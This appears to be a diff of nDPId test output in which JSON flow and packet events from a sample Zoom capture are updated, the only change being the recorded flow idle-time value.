00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="} 00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} @@ -80,26 +80,26 @@ 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569520469984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1569520469984,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6vIgAAP8Re2PAqAF1wKgBAfYMADUAJtTToX0BAAABAAAAAAAABHd3dzMEem9vbQJ1cwAAAQAB"} 00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569520470021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1569520470021,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKWCQAADcRp7jAqAEBwKgBdQA19gwANiAtoX2BgAABAAEAAAAABHd3dzMEem9vbQJ1cwAAAQABwAwAAQABAAAAPAAENMo+7A=="} 00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"} -00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"} +00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 